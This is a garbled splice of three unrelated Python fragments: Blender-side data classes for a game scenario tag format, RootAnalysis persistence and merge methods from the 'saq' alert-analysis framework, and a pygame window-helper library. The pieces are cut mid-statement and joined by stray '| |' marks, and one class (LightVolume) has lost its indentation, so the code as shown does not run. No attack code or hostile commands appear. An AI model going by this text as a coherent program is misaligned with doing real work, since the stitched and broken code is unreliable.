fw.write('write log update: ' | |
# ##### BEGIN MIT LICENSE BLOCK #####
#
# MIT License
#
# Copyright (c) 2022 <NAME>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
# ##### END MIT LICENSE BLOCK #####
from mathutils import Vector, Euler
SALT_SIZE = 32  # presumably the byte length of a salt field in the tag format — TODO confirm against usage
class ScenarioAsset():
    """Container for the parsed sections of a scenario tag.

    Every slot starts as ``None`` and is presumably filled in by a parser
    elsewhere; most sections come in (header, payload) pairs.
    """

    # Attribute names, in the original declaration order.
    _FIELDS = (
        "header",
        "scenario_body_header", "scenario_body",
        "skies_header", "skies",
        "object_name_header", "object_names",
        "scenery_header", "scenery",
        "scenery_palette_header", "scenery_palette",
        "bipeds_header", "bipeds",
        "biped_palette_header", "biped_palette",
        "vehicles_header", "vehicles",
        "vehicle_palette_header", "vehicle_palette",
        "equipment_header", "equipment",
        "equipment_palette_header", "equipment_palette",
        "weapon_header", "weapons",
        "weapon_palette_header", "weapon_palette",
        "device_machine_header", "device_machines",
        "device_machine_palette_header", "device_machine_palette",
        "light_volume_header", "light_volumes",
        "light_volume_palette_header", "light_volume_palette",
        "player_starting_profile_header", "player_starting_profiles",
        "player_starting_location_header", "player_starting_locations",
        "trigger_volumes_header", "trigger_volumes",
        "decals_header", "decals",
        "decal_palette_header", "decal_palette",
        "style_palette_header", "style_palette",
        "squad_groups_header", "squad_groups",
        "squads_header", "squads",
        "zones_header", "zones",
        "character_palette_header", "character_palette",
        "scripting_data_header", "scripting_data",
        "cutscene_flags_header", "cutscene_flags",
        "cutscene_camera_points_header", "cutscene_camera_points",
        "orders_header", "orders",
        "triggers_header", "triggers",
    )

    def __init__(self):
        # Initialize every slot to None; parsing populates them later.
        for field in self._FIELDS:
            setattr(self, field, None)
class ScenarioBody:
    """Flat record of every field in the scenario tag body.

    Every keyword argument maps 1:1 onto an instance attribute of the
    same name, so the constructor bulk-assigns them instead of spelling
    out ~110 individual `self.x = x` statements.
    """

    def __init__(self, unused_tag_ref=None, skies_tag_block=None, scenario_type=0, scenario_flags=0, child_scenarios_tag_block=None, local_north=0.0,
                 predicted_resources_tag_block=None, functions_tag_block=None, editor_scenario_data=0, comments_tag_block=None, environment_objects_tag_block=None,
                 object_names_tag_block=None, scenery_tag_block=None, scenery_palette_tag_block=None, bipeds_tag_block=None, biped_palette_tag_block=None,
                 vehicles_tag_block=None, vehicle_palette_tag_block=None, equipment_tag_block=None, equipment_palette_tag_block=None, weapons_tag_block=None,
                 weapon_palette_tag_block=None, device_groups_tag_block=None, machines_tag_block=None, machine_palette_tag_block=None, controls_tag_block=None,
                 control_palette_tag_block=None, light_fixtures_tag_block=None, light_fixtures_palette_tag_block=None, sound_scenery_tag_block=None,
                 sound_scenery_palette_tag_block=None, light_volumes_tag_block=None, light_volume_palette_tag_block=None, player_starting_profile_tag_block=None,
                 player_starting_locations_tag_block=None, trigger_volumes_tag_block=None, recorded_animations_tag_block=None, netgame_flags_tag_block=None,
                 netgame_equipment_tag_block=None, starting_equipment_tag_block=None, bsp_switch_trigger_volumes_tag_block=None, decals_tag_block=None,
                 decal_palette_tag_block=None, detail_object_collection_palette_tag_block=None, style_palette_tag_block=None, squad_groups_tag_block=None,
                 squads_tag_block=None, zones_tag_block=None, mission_scenes_tag_block=None, character_palette_tag_block=None, ai_pathfinding_data_tag_block=None,
                 ai_animation_references_tag_block=None, ai_script_references_tag_block=None, ai_recording_references_tag_block=None, ai_conversations_tag_block=None,
                 script_syntax_data_tag_data=None, script_string_data_tag_data=None, scripts_tag_block=None, globals_tag_block=None, references_tag_block=None,
                 source_files_tag_block=None, scripting_data_tag_block=None, cutscene_flags_tag_block=None, cutscene_camera_points_tag_block=None,
                 cutscene_titles_tag_block=None, custom_object_names_tag_ref=None, chapter_title_text_tag_ref=None, hud_messages_tag_ref=None,
                 structure_bsps_tag_block=None, scenario_resources_tag_block=None, old_structure_physics_tag_block=None, hs_unit_seats_tag_block=None,
                 scenario_kill_triggers_tag_block=None, hs_syntax_datums_tag_block=None, orders_tag_block=None, triggers_tag_block=None,
                 background_sound_palette_tag_block=None, sound_environment_palette_tag_block=None, weather_palette_tag_block=None, unused_0_tag_block=None,
                 unused_1_tag_block=None, unused_2_tag_block=None, unused_3_tag_block=None, scavenger_hunt_objects_tag_block=None, scenario_cluster_data_tag_block=None,
                 salt_array=None, spawn_data_tag_block=None, sound_effect_collection_tag_ref=None, crates_tag_block=None, crate_palette_tag_block=None,
                 global_lighting_tag_ref=None, atmospheric_fog_palette_tag_block=None, planar_fog_palette_tag_block=None, flocks_tag_block=None, subtitles_tag_ref=None,
                 decorators_tag_block=None, creatures_tag_block=None, creature_palette_tag_block=None, decorator_palette_tag_block=None,
                 bsp_transition_volumes_tag_block=None, structure_bsp_lighting_tag_block=None, editor_folders_tag_block=None, level_data_tag_block=None,
                 game_engine_strings_tag_ref=None, mission_dialogue_tag_block=None, objectives_tag_ref=None, interpolators_tag_block=None, shared_references_tag_block=None,
                 screen_effect_references_tag_block=None, simulation_definition_table_tag_block=None):
        # Capture the parameters before anything else lands in locals().
        params = dict(locals())
        del params['self']
        for attr, value in params.items():
            setattr(self, attr, value)
class ObjectName:
    """Named slot that placed scenario objects reference by index."""

    def __init__(self, name="", object_type=0, placement_index=0):
        # Trivial record: store each constructor argument verbatim.
        for field, value in (("name", name),
                             ("object_type", object_type),
                             ("placement_index", placement_index)):
            setattr(self, field, value)
class Object:
    """Base placement record shared by all scenario object types.

    Holds the palette/name indices, the spatial transform and the various
    editor/bsp bookkeeping fields common to scenery, units, weapons, etc.
    """

    def __init__(self, palette_index=0, name_index=0, placement_flags=0, position=None, rotation=None, scale=0.0, transform_flags=0, manual_bsp_flags=0, unique_id=0,
                 origin_bsp_index=0, object_type=0, source=0, bsp_policy=0, editor_folder_index=0):
        self.palette_index = palette_index
        self.name_index = name_index
        self.placement_flags = placement_flags
        # BUG FIX: the defaults used to be `position=Vector(), rotation=Euler()`.
        # Default values are evaluated once at function-definition time, so every
        # Object constructed without explicit values shared (and could mutate)
        # the same Vector/Euler instance.  The None sentinel gives each instance
        # a fresh one while leaving explicit-argument callers unaffected.
        self.position = Vector() if position is None else position
        self.rotation = Euler() if rotation is None else rotation
        self.scale = scale
        self.transform_flags = transform_flags
        self.manual_bsp_flags = manual_bsp_flags
        self.unique_id = unique_id
        self.origin_bsp_index = origin_bsp_index
        self.object_type = object_type
        self.source = source
        self.bsp_policy = bsp_policy
        self.editor_folder_index = editor_folder_index
class Scenery(Object):
    """Scenery placement: base Object data plus variant, colour and pathfinding fields."""

    def __init__(self, sobj_header=None, obj0_header=None, sper_header=None, sct3_header=None, variant_name_length=0, variant_name="", active_change_colors=0,
                 primary_color_BGRA=(0.0, 0.0, 0.0, 1.0), secondary_color_BGRA=(0.0, 0.0, 0.0, 1.0), tertiary_color_BGRA=(0.0, 0.0, 0.0, 1.0),
                 quaternary_color_BGRA=(0.0, 0.0, 0.0, 1.0), pathfinding_policy=0, lightmap_policy=0, pathfinding_references_header=None, pathfinding_references=None,
                 valid_multiplayer_games=0):
        # Each keyword argument maps 1:1 onto an attribute of the same name;
        # capture them before super().__init__() adds anything to locals().
        own_fields = dict(locals())
        del own_fields['self']
        super().__init__()
        for attr, value in own_fields.items():
            setattr(self, attr, value)
class Unit(Object):
    """Unit placement: base Object data plus variant, colours, vitality and flags."""

    def __init__(self, sobj_header=None, obj0_header=None, sper_header=None, sunt_header=None, variant_name_length=0, variant_name="", active_change_colors=0,
                 primary_color_BGRA=(0.0, 0.0, 0.0, 1.0), secondary_color_BGRA=(0.0, 0.0, 0.0, 1.0), tertiary_color_BGRA=(0.0, 0.0, 0.0, 1.0),
                 quaternary_color_BGRA=(0.0, 0.0, 0.0, 1.0), body_vitality=0.0, flags=0):
        # Each keyword argument maps 1:1 onto an attribute of the same name;
        # capture them before super().__init__() adds anything to locals().
        own_fields = dict(locals())
        del own_fields['self']
        super().__init__()
        for attr, value in own_fields.items():
            setattr(self, attr, value)
class Equipment(Object):
    """Equipment placement: base Object data plus the tag headers and flags."""

    def __init__(self, sobj_header=None, obj0_header=None, seqt_header=None, flags=0):
        # Each keyword argument maps 1:1 onto an attribute of the same name;
        # capture them before super().__init__() adds anything to locals().
        own_fields = dict(locals())
        del own_fields['self']
        super().__init__()
        for attr, value in own_fields.items():
            setattr(self, attr, value)
class Weapon(Object):
    """Weapon placement: base Object data plus variant, colours and ammo state."""

    def __init__(self, sobj_header=None, obj0_header=None, sper_header=None, swpt_header=None, variant_name_length=0, variant_name="", active_change_colors=0,
                 primary_color_BGRA=(0.0, 0.0, 0.0, 1.0), secondary_color_BGRA=(0.0, 0.0, 0.0, 1.0), tertiary_color_BGRA=(0.0, 0.0, 0.0, 1.0),
                 quaternary_color_BGRA=(0.0, 0.0, 0.0, 1.0), rounds_left=0, rounds_loaded=0, flags=0):
        # Each keyword argument maps 1:1 onto an attribute of the same name;
        # capture them before super().__init__() adds anything to locals().
        own_fields = dict(locals())
        del own_fields['self']
        super().__init__()
        for attr, value in own_fields.items():
            setattr(self, attr, value)
class DeviceMachine(Object):
    """Device machine placement: base Object data plus device groups and pathfinding."""

    def __init__(self, sobj_header=None, obj0_header=None, sdvt_header=None, smht_header=None, power_group_index=0, position_group_index=0, flags_0=0,
                 flags_1=0, pathfinding_references_header=None, pathfinding_references=None):
        # Each keyword argument maps 1:1 onto an attribute of the same name;
        # capture them before super().__init__() adds anything to locals().
        own_fields = dict(locals())
        del own_fields['self']
        super().__init__()
        for attr, value in own_fields.items():
            setattr(self, attr, value)
class LightVolume(Object):
def __init__(self, sobj_header=None, obj0_header=None, sdvt_header=None, slit_header=None, power_group_index=0, position_group_index=0, flags_0=0,
shape_type=0, flags_1=0, lightmap_type=0, lightmap_flags=0, lightmap_half_life=0.0, lightmap_light_scale=0.0, target_point=Vector(), width=0.0,
height_scale=0.0, field_of_view=0.0, falloff_distance=0.0, cutoff_distance=0.0):
super().__init__()
self.sobj_header = sobj_header
self.obj0_header = obj0_header
self.sdvt_header = sdvt_header
self.slit_header = slit_header
self.power_group_index = power_group_index
self.position_group_index = position_group_index
self.flags_0 = flags_0
self.shape_type = shape_type
self.flags_1 = flags_1
self.lightmap_type | |
observable {} ({}) [{}] <{}> for {} ({}) [{}] <{}>".format(o, id(o), o.id, o.type, observable, id(observable), observable.id, observable.type))
return o
observable.root = self
self.observable_store[observable.id] = observable
logging.debug("recorded observable {} with id {}".format(observable, observable.id))
self.set_modified()
return observable
def record_observable_by_spec(self, o_type, o_value, o_time=None):
    """Records the given observable into the observable_store if it does not already exist.
    Returns the new one if recorded or the existing one if not."""
    from saq.observables import create_observable
    assert isinstance(o_type, str)
    assert isinstance(self.observable_store, dict)
    assert o_time is None or isinstance(o_time, datetime.datetime)
    # Build a throwaway instance first so any custom __eq__ defined by the
    # observable type participates in the duplicate check performed by
    # record_observable().
    candidate = create_observable(o_type, o_value, o_time=o_time)
    return None if candidate is None else self.record_observable(candidate)
def schedule(self, exclusive_uuid=None):
    """Schedules this object for processing by adding it to the workload.

    Thin wrapper around saq.database.add_workload; exclusive_uuid is passed
    through unchanged (its semantics are defined there).
    """
    from saq.database import add_workload
    add_workload(self, exclusive_uuid=exclusive_uuid)
def save(self):
    """Saves the Alert to disk. Resolves AttachmentLinks into Attachments. Note that this does not insert the Alert into the system.

    Returns True on success, False if JSON encoding fails (the failure is
    logged and reported rather than raised).
    """
    assert self.json_path is not None
    assert self.json is not None
    logging.debug("SAVE: {} ({})".format(self, type(self)))
    # make sure the containing directory exists
    if not os.path.exists(os.path.join(saq.SAQ_RELATIVE_DIR, self.storage_dir)):
        os.makedirs(os.path.join(saq.SAQ_RELATIVE_DIR, self.storage_dir))
    # analysis details go into a hidden directory
    if not os.path.exists(os.path.join(saq.SAQ_RELATIVE_DIR, self.storage_dir, '.ace')):
        os.makedirs(os.path.join(saq.SAQ_RELATIVE_DIR, self.storage_dir, '.ace'))
    # save all analysis
    for analysis in self.all_analysis:
        if analysis is not self:
            analysis.save()
    # save our own details
    Analysis.save(self)
    # now the rest should encode as JSON with the custom JSON encoder
    try:
        # we use a temporary file to deal with very large JSON files taking a long time to encode
        # if we don't do this then the GUI will occasionally hit 0-byte data.json files
        temp_path = '{}.tmp'.format(self.json_path)
        with open(temp_path, 'w') as fp:
            fp.write(_JSONEncoder().encode(self))
        _track_writes()
        # only replace the live file once the temp file is fully written
        shutil.move(temp_path, self.json_path)
    except Exception as e:
        logging.error("json encoding for {0} failed: {1}".format(self, str(e)))
        report_exception()
        return False
    return True
def load(self):
    """Loads the Alert object from the JSON file. Note that this does NOT load the details property.

    Returns True on success.  Any exception raised while reading or
    materializing the JSON is logged, reported and then re-raised.
    """
    assert self.json_path is not None
    logging.debug("LOAD: called load() on {}".format(self))
    if self.is_loaded:
        logging.warning("alert {} already loaded".format(self))
    try:
        with open(self.json_path, 'r') as fp:
            self.json = json.load(fp)
        _track_reads()
        # translate the json into runtime objects
        self._materialize()
        self.is_loaded = True
        # loaded Alerts are read-only until something is modified
        # NOTE(review): attribute name looks like a typo for _read_only --
        # confirm against the rest of the class before renaming it
        self._ready_only = True
        return True
    except Exception as e:
        logging.error("unable to load json from {0}: {1}".format(
            self.json_path, str(e)))
        report_exception()
        # FIX: bare raise preserves the original traceback; the previous
        # `raise e` re-raised the same object but reset the raise location
        raise
def flush(self):
    """Calls Analysis.flush on all Analysis objects in this RootAnalysis.

    Deliberately does NOT flush the RootAnalysis' own details, then runs a
    garbage collection pass to reclaim the detached detail objects.
    """
    # make sure the containing directory exists
    if not os.path.exists(os.path.join(saq.SAQ_RELATIVE_DIR, self.storage_dir)):
        os.makedirs(os.path.join(saq.SAQ_RELATIVE_DIR, self.storage_dir))
    # analysis details go into a hidden directory
    if not os.path.exists(os.path.join(saq.SAQ_RELATIVE_DIR, self.storage_dir, '.ace')):
        os.makedirs(os.path.join(saq.SAQ_RELATIVE_DIR, self.storage_dir, '.ace'))
    for analysis in self.all_analysis:
        if analysis is not self:
            analysis.flush()
    # FIX: the collected-object count was bound to an unused local that only
    # fed a commented-out debug line; discard it
    gc.collect()
def merge(self, target_analysis, other):
    """Merges the Observables and Analysis of an existing RootAnalysis into the target Analysis object.

    target_analysis: the Analysis inside this RootAnalysis that receives
        references to the merged root-level observables.
    other: the RootAnalysis whose observables and analysis are copied in.

    Three passes: (1) record each of other's observables here (copying any
    backing files for F_FILE observables), (2) re-attach analysis objects and
    re-target relationships onto the recorded copies, (3) attach other's
    root-level observables to target_analysis.
    """
    assert isinstance(target_analysis, Analysis)
    assert isinstance(other, RootAnalysis)
    logging.debug("merging {} into {} target {}".format(other, self, target_analysis))
    # maps the observables from the other alert to new ones in this one
    transfer_map = {} # key = uuid of other observable, value = uuid of the new observable
    # go through and copy all the observations over first
    for other_observable in other.all_observables:
        # does this observation already exist?
        existing_observable = self.get_observable_by_spec(other_observable.type,
                                                          other_observable.value,
                                                          other_observable.time)
        if existing_observable:
            target_observable = existing_observable
            logging.debug("merging existing observable {}".format(target_observable))
        else:
            # NOTE that here we don't want to actually add this other observable
            # because it has references to Analysis objects we need to add below
            # so we create a new one based on this one
            logging.debug("making copy of {}".format(other_observable))
            target_observable = copy.copy(other_observable)
            target_observable.clear_analysis() # make sure these are cleared out (we'll add them back in later...)
            # note that we use the record_observable here instead of add_observable
            # we're just moving them over into this RootAnalysis right now
            target_observable = self.record_observable(target_observable)
            # if the observable is a file then the actual file needs to be copied over
            # TODO this should go into the functionality of the observable class
            if target_observable.type == F_FILE:
                src_path = os.path.join(other.storage_dir, other_observable.value)
                if not os.path.exists(src_path):
                    logging.error("merge for {} has missing file {}".format(other, src_path))
                else:
                    dest_dir = os.path.join(self.storage_dir, os.path.dirname(other_observable.value))
                    dest_path = os.path.join(dest_dir, os.path.basename(other_observable.value))
                    try:
                        logging.debug("copying merged file observable {} to {}".format(src_path, dest_path))
                        if not os.path.isdir(dest_dir):
                            os.makedirs(dest_dir)
                        shutil.copy(src_path, dest_path)
                    except Exception as e:
                        logging.error("unable to copy {} to {}: {}".format(src_path, dest_path, e))
                        report_exception()
        # keep track of how they are moving over
        transfer_map[other_observable.id] = target_observable.id
    # second pass: every observable now has a counterpart in this root, so
    # relationships and analysis can be re-attached safely
    for other_observable in other.all_observables:
        # find the corresponding observable in this alert
        target_observable = self.get_observable_by_spec(other_observable.type,
                                                        other_observable.value,
                                                        other_observable.time)
        if target_observable is None:
            logging.error("could not find target observable {} in {}".format(other_observable, self))
            continue
        # remap relationships
        for r in target_observable.relationships:
            if r.target.id in transfer_map:
                logging.debug("re-targeting {}".format(r))
                r.target = self.get_observable_by_spec(other.observable_store[r.target.id].type,
                                                       other.observable_store[r.target.id].value,
                                                       other.observable_store[r.target.id].time)
        for other_analysis in other_observable.all_analysis:
            # do we already have this analysis for this observable in the target?
            existing_analysis = target_observable.get_analysis(type(other_analysis))
            if existing_analysis is None:
                logging.debug("merging analysis {} into {}".format(other_analysis, target_observable))
                details = other_analysis.details
                new_analysis = copy.copy(other_analysis)
                new_analysis.clear_observables()
                # reset external storage state so the copy re-saves its details here
                new_analysis.external_details_path = None
                new_analysis.external_details_loaded = False
                new_analysis.external_details = None
                new_analysis.details = details
                new_analysis.set_modified()
                #new_analysis = type(other_analysis)()
                #new_analysis.details = other_analysis.details
                target_observable.add_analysis(new_analysis)
                # and then copy all the observables in
                for o in other_analysis.observables:
                    # find the corresponding observable in this root
                    current_observable = self.get_observable_by_spec(o.type, o.value, o.time)
                    if current_observable is None:
                        logging.error("could not find current observable {} in {} for {}".format(
                            o, self, other_analysis))
                    else:
                        new_analysis.add_observable(current_observable)
            else:
                logging.debug("skipping merge for existing analysis {}".format(existing_analysis))
    # finally, all the observables in the RootAnalysis object get added to the target_analysis
    for other_observable in other.observables:
        existing_observable = self.get_observable_by_spec(other_observable.type,
                                                          other_observable.value,
                                                          other_observable.time)
        if existing_observable is None:
            logging.error("cannot find observable type {} value {} time {}".format(other_observable.type,
                                                                                   other_observable.value,
                                                                                   other_observable.time))
        else:
            target_analysis.add_observable(existing_observable)
def _materialize(self):
    """Utility function to replace specific dict() in json with runtime object references.

    Runs after self.json has been loaded: rebuilds the observable store,
    then the Analysis objects, tags, detection points, relationships and
    finally the dependency tracking graph -- in that order, since later
    steps reference objects created by earlier ones.
    """
    # in other words, load the JSON
    self._load_observable_store()
    # load the Analysis objects in the Observables
    for observable in self.observable_store.values():
        observable._load_analysis()
    # load the Observable references in the Analysis objects
    for analysis in self.all_analysis:
        analysis._load_observable_references()
    # load Tag objects for analysis
    for analysis in self.all_analysis:
        analysis.tags = [Tag(json=t) for t in analysis.tags]
    # load Tag objects for observables
    for observable in self.observable_store.values():
        observable.tags = [Tag(json=t) for t in observable.tags]
    # load DetectionPoints
    for analysis in self.all_analysis:
        analysis.detections = [DetectionPoint.from_json(dp) for dp in analysis.detections]
    for observable in self.all_observables:
        observable.detections = [DetectionPoint.from_json(dp) for dp in observable.detections]
    # load Relationships
    for observable in self.all_observables:
        observable._load_relationships()
    # load dependency tracking
    _buffer = []
    for dep_dict in self.dependency_tracking:
        _buffer.append(AnalysisDependency.from_json(dep_dict))
        #_buffer.append(AnalysisDependency(dep_dict[AnalysisDependency.KEY_TARGET_OBSERVABLE_ID],
        #dep_dict[AnalysisDependency.KEY_TARGET_ANALYSIS_TYPE],
        #dep_dict[AnalysisDependency.KEY_SOURCE_OBSERVABLE_ID],
        #dep_dict[AnalysisDependency.KEY_SOURCE_ANALYSIS_TYPE],
        #dep_dict[AnalysisDependency.KEY_DEPENDENCY_FAILED]))
    for dep in _buffer:
        dep.root = self
    self.dependency_tracking = _buffer
    for dep in self.dependency_tracking:
        self.link_dependencies(dep)
def _load_observable_store(self):
    """Replaces the raw JSON dicts in observable_store with Observable objects.

    Entries whose type/value cannot be turned into an Observable (e.g. old
    alerts with invalid data) are logged and dropped from the store.
    """
    from saq.observables import create_observable
    invalid_uuids = [] # list of uuids that don't load for whatever reason
    for uuid in self.observable_store.keys():
        # get the JSON dict from the observable store for this uuid
        value = self.observable_store[uuid]
        # create the observable from the type and value
        o = create_observable(value['type'], value['value'])
        # basically this is backwards compatibility with old alerts that have invalid values for observables
        if o:
            o.root = self
            o.json = value # this sets everything else
            # set up the EVENT_GLOBAL_* events
            o.add_event_listener(EVENT_ANALYSIS_ADDED, o.root._fire_global_events)
            o.add_event_listener(EVENT_TAG_ADDED, o.root._fire_global_events)
            # replacing values while iterating over keys() is safe; only
            # the deletions below must be deferred until after the loop
            self.observable_store[uuid] = o
        else:
            logging.warning("invalid observable type {} value {}".format(value['type'], value['value']))
            invalid_uuids.append(uuid)
    for uuid in invalid_uuids:
        del self.observable_store[uuid]
def reset(self):
    """Removes analysis, dispositions and any observables that did not originally come with the alert.

    Acquires the database lock for this uuid first and always releases it,
    raising LockedException when the lock cannot be obtained.
    """
    from saq.database import acquire_lock, release_lock, LockedException
    lock_id = None
    try:
        lock_id = acquire_lock(self.uuid)
        if not lock_id:
            # someone else holds the lock -- refuse to reset
            raise LockedException(self)
        return self._reset()
    finally:
        # release only if we actually obtained the lock
        if lock_id:
            release_lock(self.uuid, lock_id)
def _reset(self):
from subprocess import Popen
self.set_modified()
logging.info("resetting {}".format(self))
# NOTE that we do not clear the details that came with Alert
# clear external details storage for all analysis (except self)
for _analysis in self.all_analysis:
if _analysis is self:
continue
_analysis.reset()
# remove analysis objects from all observables
for o in self.observables:
o.clear_analysis()
# remove observables from the observable_store | |
fps == "MAX":fps = 1000
elif fps == "MIN":fps = 30
else:
print(colorama.Fore.RED+'Error'+colorama.Fore.RESET)
print(colorama.Fore.YELLOW+'None fps'+colorama.Fore.RESET)
sys.exit()
self.clock.tick(fps)
def GET_INIT(self):
    # True once the pygame display module has been initialised.
    return pygame.display.get_init()
def GET_DISPLAY_DRIVER(self):
    # Name of the video driver pygame is using (e.g. "x11", "windows").
    return pygame.display.get_driver()
def GET_TOP(self, cor='X', storona='left'):
    """Coordinate of the top screen edge along the requested axis.

    cor: 'X'/'x' or 'Y'/'y'; storona: 'left' or 'right' end of the edge.
    Prints an error and exits for any other combination.
    """
    # BUG FIX: the original chained `cor=='X' or cor=='x' and storona==...`;
    # `and` binds tighter than `or`, so e.g. ('X', 'right') matched the first
    # branch and returned 0 instead of the screen width.
    if cor in ('X', 'x') and storona == 'left':
        return 0
    elif cor in ('X', 'x') and storona == 'right':
        return self.screen.get_width()
    elif cor in ('Y', 'y') and storona == 'left':
        return 0
    elif cor in ('Y', 'y') and storona == 'right':
        return 0
    else:
        print(colorama.Fore.RED+'Error'+colorama.Fore.RESET)
        print(colorama.Fore.YELLOW+'None cordinate'+colorama.Fore.RESET)
        # fixed message typo: 'fight' -> 'right'
        print(colorama.Fore.YELLOW+'Uses left or right'+colorama.Fore.RESET)
        sys.exit()
def GET_DOWN(self, cor='X', storona='left'):
    """Coordinate of the bottom screen edge along the requested axis.

    cor: 'X'/'x' or 'Y'/'y'; storona: 'left' or 'right' end of the edge.
    Prints an error and exits for any other combination.
    """
    # BUG FIX: same operator-precedence bug as GET_TOP -- ('X', 'right')
    # previously returned 0 instead of the screen width.
    if cor in ('X', 'x') and storona == 'left':
        return 0
    elif cor in ('X', 'x') and storona == 'right':
        return self.screen.get_width()
    elif cor in ('Y', 'y') and storona == 'left':
        return self.screen.get_height()
    elif cor in ('Y', 'y') and storona == 'right':
        return self.screen.get_height()
    else:
        print(colorama.Fore.RED+'Error'+colorama.Fore.RESET)
        print(colorama.Fore.YELLOW+'None cordinate'+colorama.Fore.RESET)
        # fixed message typo: 'fight' -> 'right'
        print(colorama.Fore.YELLOW+'Uses left or right'+colorama.Fore.RESET)
        sys.exit()
def GET_LEFT(self, cor='X', storona='up'):
    """Coordinate of the left screen edge along the requested axis.

    cor: 'X'/'x' or 'Y'/'y'; storona: 'up' or 'down' end of the edge.
    Prints an error and exits for any other combination.
    """
    # BUG FIX: the original's unparenthesised `or`/`and` chain made
    # ('Y', 'down') match the `cor=='Y' or ...` branch and return 0
    # instead of the screen height.
    if cor in ('X', 'x') and storona == 'up':
        return 0
    elif cor in ('X', 'x') and storona == 'down':
        return 0
    elif cor in ('Y', 'y') and storona == 'up':
        return 0
    elif cor in ('Y', 'y') and storona == 'down':
        return self.screen.get_height()
    else:
        print(colorama.Fore.RED+'Error'+colorama.Fore.RESET)
        print(colorama.Fore.YELLOW+'None cordinate'+colorama.Fore.RESET)
        print(colorama.Fore.YELLOW+'Uses up or down'+colorama.Fore.RESET)
        sys.exit()
def GET_RIGHT(self, cor='X', storona='up'):
    """Coordinate of the right screen edge along the requested axis.

    cor: 'X'/'x' or 'Y'/'y'; storona: 'up' or 'down' end of the edge.
    Prints an error and exits for any other combination.
    """
    # BUG FIX: the original's unparenthesised `or`/`and` chain made
    # ('Y', 'down') match the `cor=='Y' or ...` branch and return 0
    # instead of the screen height.
    if cor in ('X', 'x') and storona == 'up':
        return self.screen.get_width()
    elif cor in ('X', 'x') and storona == 'down':
        return self.screen.get_width()
    elif cor in ('Y', 'y') and storona == 'up':
        return 0
    elif cor in ('Y', 'y') and storona == 'down':
        return self.screen.get_height()
    else:
        print(colorama.Fore.RED+'Error'+colorama.Fore.RESET)
        print(colorama.Fore.YELLOW+'None cordinate'+colorama.Fore.RESET)
        print(colorama.Fore.YELLOW+'Uses up or down'+colorama.Fore.RESET)
        sys.exit()
def GET_FPS(self):
    """Current measured framerate, truncated to an integer."""
    return int(self.clock.get_fps())
def CLOSE(self, running=True, EXIT_BUTTON='esc'):
    """Pump the event queue; returns False after a QUIT event, otherwise `running`.

    Also forwards a batch of events to pygame_widgets and hard-exits the
    process when EXIT_BUTTON is held (via the keyboard module).
    """
    for event in pygame.event.get():
        if event.type == pygame.QUIT:
            running = False
    # NOTE(review): this second get() drains a *new* batch of events --
    # anything arriving here was never seen by the QUIT loop above (and
    # vice versa).  Confirm whether that is intended.
    events = pygame.event.get()
    pygame_widgets.update(events)
    if keyboard.is_pressed(EXIT_BUTTON):
        sys.exit()
    return running
def EXIT(self, EXIT_BUTTON='esc'):
    # Hard-exit the process when the keyboard module reports EXIT_BUTTON held.
    if keyboard.is_pressed(EXIT_BUTTON):
        sys.exit()
def GET_WIN_SIZE(self):
    # (width, height) of the window surface in pixels.
    return self.screen.get_size()
def GET_WIN_WIDTH(self):
    """Window width in pixels."""
    width, _height = self.screen.get_size()
    return width
def GET_WIN_HEIGHT(self):
    """Window height in pixels."""
    _width, height = self.screen.get_size()
    return height
def GET_EVENT(self):
    """Drain and return the pending pygame events."""
    return pygame.event.get()
def FUNCTION(self, functions=[]):
    """Call each callable in *functions*, in order, with no arguments."""
    for fn in functions:
        fn()
def GET_GL_FUNCTIONS(self):
    """Print the FUNCTION-string codes understood by the GL drawing classes."""
    print(colorama.Fore.GREEN+'GL_FUNCTIONS---')
    print('''
Draw f- D-none
Obv f- O-(rrr)(ggg)(bbb)-THICKNESS
DrOb f- OD-(rrr)(ggg)(bbb)-THICKNESS
'''+colorama.Fore.RESET)
def UPDATE_SCREEN(self):
    """Refresh the cached width/height attributes from the screen surface."""
    self.width, self.height = self.screen.get_width(), self.screen.get_height()
class UPDATE():
    """Display refresh helper.

    NOTE(review): instantiating this class flips the display as a side
    effect, and the methods rely on the module-level globals `start_time`
    and `screen` -- confirm those globals exist wherever this is used.
    """
    def __init__(self):
        # Present the back buffer (side effect of construction).
        pygame.display.flip()
    def GETTIME(self):
        # Increment and return the global tick counter.
        global start_time
        start_time+=1
        return start_time
    def SETBGCOLOR(self,col='white'):
        # Fill the global screen surface with the given colour.
        screen.fill(col)
class GL:
    # Namespace for the immediate-mode drawing primitives nested below
    # (Rect, Poligon); the class itself holds no state.
    def __init__(self):
        pass
class Rect:
    """Immediate-mode rectangle wrapper around pygame.draw.rect.

    The FUNCTION string is a mini-language: 'D' draws filled, strings whose
    second char is 'D' draw fill + outline ('OD-(rrr)(ggg)(bbb)-THICKNESS'),
    and strings starting with 'O' draw outline only
    ('O-(rrr)(ggg)(bbb)-THICKNESS').  Anything else draws nothing.

    NOTE(review): POSITION/SIZE default to shared mutable lists and indexing
    them with the defaults raises IndexError -- callers apparently always
    pass both; confirm before relying on the defaults.
    """
    def __init__(self,COLOR=(),POSITION=[],SIZE=[],THICKNESS=0,SURF=None,FUNCTION='none'):
        # default outline thickness; may be overridden by the FUNCTION string
        sh2 = 1
        center = [POSITION[0] + SIZE[0]/2,POSITION[1]+SIZE[1]/2]
        pos=[POSITION[0],POSITION[1]]
        up = [POSITION[0],POSITION[1]]
        # NOTE(review): down/right add SIZE[1] to x and SIZE[0] to y --
        # width/height look swapped relative to `center`; confirm intent.
        down = [POSITION[0]+SIZE[1],POSITION[1]+SIZE[0]]
